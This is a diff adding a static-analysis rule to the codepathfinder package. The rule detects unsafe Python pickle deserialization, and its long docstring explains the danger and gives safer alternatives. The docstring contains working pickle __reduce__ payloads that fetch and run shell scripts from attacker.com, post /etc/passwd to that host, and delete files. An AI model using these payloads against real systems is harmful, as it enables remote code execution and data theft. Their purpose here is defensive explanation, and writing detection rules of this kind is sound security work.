codepathfinder 1.2.0__py3-none-manylinux_2_17_aarch64.whl

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,479 @@
1
+ """
2
+ PYTHON-DESER-001: Unsafe Pickle Deserialization
3
+
4
+ Security Impact: CRITICAL
5
+ CWE: CWE-502 (Deserialization of Untrusted Data)
6
+ CVE: CVE-2021-3177 (buffer overflow in ctypes PyCArg_repr; related RCE-class reference, not a pickle-specific CVE)
7
+ OWASP: A08:2021 - Software and Data Integrity Failures
8
+
9
+ DESCRIPTION:
10
+ This rule detects unsafe pickle deserialization where untrusted user input flows directly
11
+ to pickle.loads() or pickle.load(). Pickle is Python's binary serialization format that can
12
+ execute arbitrary code during deserialization, making it extremely dangerous when used with
13
+ untrusted data.
14
+
15
+ WHAT IS PICKLE DESERIALIZATION:
16
+
17
+ Python's pickle module serializes (pickles) and deserializes (unpickles) Python objects.
18
+ Unlike JSON, pickle can serialize ANY Python object, including:
19
+ - Functions and classes
20
+ - Object instances with custom __reduce__ methods
21
+ - Arbitrary bytecode
22
+
23
+ **The Problem**: During unpickling, pickle can execute arbitrary Python code by design.
24
+ This is not a bug - it's a feature that becomes a critical vulnerability with untrusted input.
25
+
26
+ SECURITY IMPLICATIONS:
27
+
28
+ **1. Remote Code Execution (RCE)**:
29
+ An attacker can craft a malicious pickle payload that executes arbitrary code when unpickled:
30
+
31
+ ```python
32
+ import pickle
33
+ import os
34
+
35
+ # Malicious pickle payload
36
+ class Exploit:
37
+ def __reduce__(self):
38
+ return (os.system, ('curl attacker.com/backdoor.sh | bash',))
39
+
40
+ # Serialized payload
41
+ malicious_data = pickle.dumps(Exploit())
42
+
43
+ # When victim unpickles this, it executes the command!
44
+ pickle.loads(malicious_data) # RCE!
45
+ ```
46
+
47
+ **2. System Compromise**:
48
+ Attackers can:
49
+ - Execute shell commands
50
+ - Read/write files
51
+ - Steal credentials
52
+ - Install backdoors
53
+ - Modify system configuration
54
+ - Establish persistence
55
+
56
+ **3. Data Exfiltration**:
57
+ ```python
58
+ class DataExfil:
59
+ def __reduce__(self):
60
+ cmd = 'curl -X POST --data @/etc/passwd attacker.com/collect'
61
+ return (os.system, (cmd,))
62
+ ```
63
+
64
+ **4. Denial of Service**:
65
+ - Crash the application
66
+ - Consume all memory (small "pickle bomb" payloads that expand on load, analogous to XML's billion laughs attack)
67
+ - Fork bomb attacks
68
+
69
+ VULNERABLE EXAMPLE:
70
+ ```python
71
+ import pickle
72
+ from flask import Flask, request
73
+
74
+ app = Flask(__name__)
75
+
76
+ @app.route('/api/load_data', methods=['POST'])
77
+ def load_user_data():
78
+ \"\"\"
79
+ CRITICAL VULNERABILITY: Deserializing untrusted pickle data!
80
+ \"\"\"
81
+ # Source: User-controlled input
82
+ serialized_data = request.data
83
+
84
+ # Sink: Unsafe deserialization
85
+ user_data = pickle.loads(serialized_data) # RCE here!
86
+
87
+ return {'data': user_data}
88
+
89
+ # Attack:
90
+ # POST /api/load_data
91
+ # Body: <malicious pickle payload>
92
+ # Result: Arbitrary code execution on server
93
+ ```
94
+
95
+ **Creating malicious payload**:
96
+ ```python
97
+ import pickle
98
+ import os
99
+ import base64
100
+
101
+ class RCE:
102
+ def __reduce__(self):
103
+ # Execute: curl attacker.com/shell | bash
104
+ cmd = 'curl attacker.com/shell.sh | bash'
105
+ return (os.system, (cmd,))
106
+
107
+ payload = pickle.dumps(RCE())
108
+ print(base64.b64encode(payload))
109
+ # Send this to vulnerable endpoint
110
+ ```
111
+
112
+ SECURE EXAMPLE:
113
+ ```python
114
+ import json
115
+ from flask import Flask, request
116
+ import hmac
117
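+ import hashlib
+ import base64  # used by load_trusted_data below
+ import pickle  # used by load_trusted_data below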
118
+
119
+ app = Flask(__name__)
120
+ SECRET_KEY = 'your-secret-key-here'
121
+
122
+ @app.route('/api/load_data', methods=['POST'])
123
+ def load_user_data():
124
+ \"\"\"
125
+ SECURE: Use JSON for untrusted data, not pickle!
126
+ \"\"\"
127
+ try:
128
+ # Use JSON instead of pickle
129
+ user_data = json.loads(request.data)
130
+ return {'data': user_data}
131
+ except json.JSONDecodeError:
132
+ return {'error': 'Invalid JSON'}, 400
133
+
134
+ # If you MUST use pickle with trusted sources:
135
+ @app.route('/api/load_trusted', methods=['POST'])
136
+ def load_trusted_data():
137
+ \"\"\"
138
+ LESS UNSAFE: Verify HMAC signature before unpickling.
139
+ Only use this for data you control!
140
+ \"\"\"
141
+ data = request.get_json()
142
+ signed_data = base64.b64decode(data['signed_data'])
143
+ signature = data['signature']
144
+
145
+ # Verify HMAC signature
146
+ expected = hmac.new(SECRET_KEY.encode(), signed_data, hashlib.sha256).hexdigest()
147
+ if not hmac.compare_digest(signature, expected):
148
+ return {'error': 'Invalid signature'}, 403
149
+
150
+ # Only unpickle if signature is valid
151
+ obj = pickle.loads(signed_data)
152
+ return {'data': str(obj)}
153
+ ```
154
+
155
+ ALTERNATIVE SECURE APPROACHES:
156
+
157
+ **1. Use JSON** (Recommended):
158
+ ```python
159
+ import json
160
+
161
+ # JSON is safe for untrusted data
162
+ data = json.loads(user_input)
163
+
164
+ # Limitations: Can't serialize custom classes
165
+ # But that's a GOOD thing for security!
166
+ ```
167
+
168
+ **2. Use MessagePack**:
169
+ ```python
170
+ import msgpack
171
+
172
+ # Fast binary serialization, safe for untrusted data
173
+ data = msgpack.unpackb(user_input)
174
+
175
+ # More efficient than JSON, still safe
176
+ ```
177
+
178
+ **3. Use Protocol Buffers**:
179
+ ```python
180
+ import user_pb2 # Generated from .proto file
181
+
182
+ user = user_pb2.User()
183
+ user.ParseFromString(user_input)
184
+
185
+ # Type-safe, fast, secure
186
+ ```
187
+
188
+ **4. Django Signing**:
189
+ ```python
190
+ from django.core import signing
191
+
192
+ # Serialize with signature
193
+ signed_data = signing.dumps({'user_id': 123})
194
+
195
+ # Deserialize with signature verification
196
+ try:
197
+ data = signing.loads(signed_data)
198
+ except signing.BadSignature:
199
+ # Tampered data detected
200
+ pass
201
+ ```
202
+
203
+ **5. If you MUST use pickle** (internal use only):
204
+ ```python
205
+ import pickle
206
+ import hmac
207
+
208
+ SECRET = b'your-secret-key'
209
+
210
+ def safe_pickle_dumps(obj):
211
+ \"\"\"Pickle with HMAC signature.\"\"\"
212
+ data = pickle.dumps(obj)
213
+ sig = hmac.new(SECRET, data, 'sha256').digest()
214
+ return sig + data
215
+
216
+ def safe_pickle_loads(signed_data):
217
+ \"\"\"Verify HMAC before unpickling.\"\"\"
218
+ sig, data = signed_data[:32], signed_data[32:]
219
+ expected = hmac.new(SECRET, data, 'sha256').digest()
220
+
221
+ if not hmac.compare_digest(sig, expected):
222
+ raise ValueError("Invalid signature")
223
+
224
+ return pickle.loads(data)
225
+
226
+ # Still only use with data YOU control!
227
+ ```
228
+
229
+ DETECTION AND PREVENTION:
230
+
231
+ **Pre-deployment checks**:
232
+ ```bash
233
+ # Scan for unsafe pickle usage
234
+ pathfinder scan --project . --ruleset cpf/python/PYTHON-DESER-001
235
+
236
+ # Automated CI/CD:
237
+ # .github/workflows/security.yml
238
+ - name: Check for unsafe deserialization
239
+ run: pathfinder ci --project . --ruleset cpf/python/deserialization
240
+ ```
241
+
242
+ **Code Review Checklist**:
243
+ - [ ] No `pickle.loads()` or `pickle.load()` with user input
244
+ - [ ] No `_pickle.loads()` with user input
245
+ - [ ] Use JSON/MessagePack for untrusted data
246
+ - [ ] If pickle required, use HMAC signature verification
247
+ - [ ] Never unpickle data from network/external sources
248
+ - [ ] Use `json.loads()` as default serialization
249
+
250
+ **Static Analysis**:
251
+ ```bash
252
+ # Find all pickle.loads usage
253
+ grep -rn "pickle.loads" --include="*.py"
254
+ grep -rn "pickle.load" --include="*.py"
255
+
256
+ # Check if input is from untrusted sources
257
+ # (request.data, request.POST, user input, etc.)
258
+ ```
259
+
260
+ REAL-WORLD ATTACK SCENARIOS:
261
+
262
+ **1. Web API Attack**:
263
+ ```python
264
+ # Vulnerable endpoint
265
+ @app.route('/api/session', methods=['POST'])
266
+ def restore_session():
267
+ session_data = pickle.loads(request.data) # RCE!
268
+
269
+ # Attack payload:
270
+ import pickle, os
271
+ class RCE:
272
+ def __reduce__(self):
273
+ return (os.system, ('rm -rf /tmp/*',))
274
+
275
+ payload = pickle.dumps(RCE())
276
+ # POST /api/session with payload
277
+ ```
278
+
279
+ **2. Cookie Deserialization**:
280
+ ```python
281
+ # Vulnerable cookie handling
282
+ cookie = request.cookies.get('session')
283
+ session = pickle.loads(base64.b64decode(cookie)) # RCE!
284
+
285
+ # Attacker sets cookie to malicious payload
286
+ ```
287
+
288
+ **3. Redis/Memcache Cache Attack**:
289
+ ```python
290
+ # Vulnerable cache read
291
+ cached = redis.get(f'user:{user_id}')
292
+ user = pickle.loads(cached) # RCE if attacker controls Redis!
293
+ ```
294
+
295
+ **4. Message Queue Attack**:
296
+ ```python
297
+ # Vulnerable Celery/RabbitMQ
298
+ def process_task(serialized_task):
299
+ task = pickle.loads(serialized_task) # RCE!
300
+ task.execute()
301
+ ```
302
+
303
+ COMPLIANCE AND AUDITING:
304
+
305
+ **OWASP Top 10 A08:2021**:
306
+ > "Software and Data Integrity Failures - Insecure Deserialization"
307
+
308
+ **CWE-502**:
309
+ > "Deserialization of Untrusted Data"
310
+
311
+ **SANS Top 25**:
312
+ Insecure Deserialization ranked as critical vulnerability
313
+
314
+ **NIST SP 800-53**:
315
+ SI-10: Information Input Validation
316
+
317
+ **PCI DSS Requirement 6.5.1**:
318
+ > "Injection flaws"
319
+
320
+ MIGRATION GUIDE:
321
+
322
+ **Step 1: Find all pickle usage**:
323
+ ```bash
324
+ # Audit codebase
325
+ grep -rn "import pickle" --include="*.py"
326
+ grep -rn "from pickle" --include="*.py"
327
+ ```
328
+
329
+ **Step 2: Replace with JSON**:
330
+ ```python
331
+ # BEFORE
332
+ data = pickle.loads(user_input)
333
+
334
+ # AFTER
335
+ data = json.loads(user_input)
336
+ ```
337
+
338
+ **Step 3: Handle custom objects**:
339
+ ```python
340
+ # BEFORE (pickle can serialize any object)
341
+ user = User(name="Alice", age=30)
342
+ serialized = pickle.dumps(user)
343
+
344
+ # AFTER (use to_dict/from_dict pattern)
345
+ class User:
346
+ def to_dict(self):
347
+ return {'name': self.name, 'age': self.age}
348
+
349
+ @classmethod
350
+ def from_dict(cls, data):
351
+ return cls(name=data['name'], age=data['age'])
352
+
353
+ serialized = json.dumps(user.to_dict())
354
+ user = User.from_dict(json.loads(serialized))
355
+ ```
356
+
357
+ **Step 4: Secure internal pickle usage**:
358
+ ```python
359
+ # If pickle needed for internal use (never user input!)
360
+ import pickle
361
+ import hmac
362
+
363
+ def secure_loads(signed_data, secret):
364
+ sig, data = signed_data[:32], signed_data[32:]
365
+ if not hmac.compare_digest(sig, hmac.new(secret, data, 'sha256').digest()):
366
+ raise ValueError("Tampered data")
367
+ return pickle.loads(data)
368
+ ```
369
+
370
+ FRAMEWORK-SPECIFIC NOTES:
371
+
372
+ **Django**:
373
+ ```python
374
+ # Don't use pickle for sessions
375
+ # settings.py
376
+ SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'
377
+
378
+ # NOT this:
379
+ # SESSION_SERIALIZER = 'django.contrib.sessions.serializers.PickleSerializer'
380
+ ```
381
+
382
+ **Flask**:
383
+ ```python
384
+ # Use itsdangerous for signed cookies
385
+ from itsdangerous import URLSafeSerializer
386
+
387
+ s = URLSafeSerializer(secret_key)
388
+ signed = s.dumps({'user_id': 123})
389
+ data = s.loads(signed) # Safe!
390
+ ```
391
+
392
+ **Celery**:
393
+ ```python
394
+ # Use JSON serializer, not pickle
395
+ # celeryconfig.py
396
+ task_serializer = 'json'
397
+ result_serializer = 'json'
398
+ accept_content = ['json']
399
+
400
+ # NOT:
401
+ # task_serializer = 'pickle'
402
+ ```
403
+
404
+ REFERENCES:
405
+ - CWE-502: Deserialization of Untrusted Data (https://cwe.mitre.org/data/definitions/502.html)
406
+ - CVE-2021-3177: Python buffer overflow in ctypes PyCArg_repr (https://nvd.nist.gov/vuln/detail/CVE-2021-3177)
407
+ - OWASP A08:2021 - Software and Data Integrity Failures
408
+ - Python Pickle Documentation (Security Warning!)
409
+ - Deserialization Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html
410
+
411
+ DETECTION SCOPE:
412
+ This rule performs intra-procedural analysis only. It detects unsafe pickle deserialization
413
+ when both the source (user input) and sink (pickle.loads) are in the same function. It will
414
+ NOT detect cases where user input is passed through multiple functions before being unpickled.
415
+
416
+ LIMITATION:
417
+ - Only detects flows within a single function (intra-procedural)
418
+ - Does not track dataflow across function boundaries (inter-procedural)
419
+ - May miss complex multi-function deserialization patterns
420
+ """
421
+
422
+ from rules.python_decorators import python_rule
423
+ from codepathfinder import calls, flows
424
+ from codepathfinder.presets import PropagationPresets
425
+
426
+
427
@python_rule(
    id="PYTHON-DESER-001",
    name="Unsafe Pickle Deserialization",
    severity="CRITICAL",
    category="deserialization",
    cwe="CWE-502",
    cve="CVE-2021-3177",
    tags="python,deserialization,pickle,rce,untrusted-data,owasp-a08,cwe-502,remote-code-execution,critical,security,intra-procedural",
    message="Unsafe pickle deserialization: Untrusted data flows to pickle.loads() which can execute arbitrary code. Use json.loads() instead.",
    owasp="A08:2021",
)
def detect_pickle_deserialization():
    """
    Describe the taint flow "untrusted input -> pickle deserialization".

    The returned value is whatever ``flows(...)`` produces for the source,
    sink and sanitizer patterns listed below, restricted to ``scope="local"``.

    LIMITATION: with local scope only intra-procedural flows are reported,
    i.e. the untrusted read and the ``pickle.loads`` call must live in the
    same function. A flow that crosses a function boundary is not detected.

    Example of code this rule is meant to flag:
        user_data = request.data
        obj = pickle.loads(user_data)  # RCE!
    """
    # Call patterns treated as producers of attacker-controlled data.
    source_patterns = (
        "request.data",
        "request.get_data",
        "request.GET",
        "request.POST",
        "request.COOKIES",
        "input",
        "*.data",
        "*.GET",
        "*.POST",
        "*.read",
        "*.recv",
    )

    # Call patterns treated as dangerous deserialization entry points.
    # NOTE(review): the wildcard entries presumably exist to catch aliased
    # pickle imports, but they look like they would also match json.loads /
    # yaml.load -- TODO confirm against the engine's matching semantics.
    sink_patterns = (
        "pickle.loads",
        "pickle.load",
        "_pickle.loads",
        "_pickle.load",
        "*.loads",
        "*.load",
    )

    # Call patterns that mark the data as validated before it reaches a sink.
    sanitizer_patterns = (
        "*.validate",
        "*.verify_signature",
        "*.verify",
        "hmac.compare_digest",
    )

    return flows(
        from_sources=[calls(pattern) for pattern in source_patterns],
        to_sinks=[calls(pattern) for pattern in sink_patterns],
        sanitized_by=[calls(pattern) for pattern in sanitizer_patterns],
        propagates_through=PropagationPresets.standard(),
        scope="local",  # CRITICAL: only intra-procedural analysis works
    )
File without changes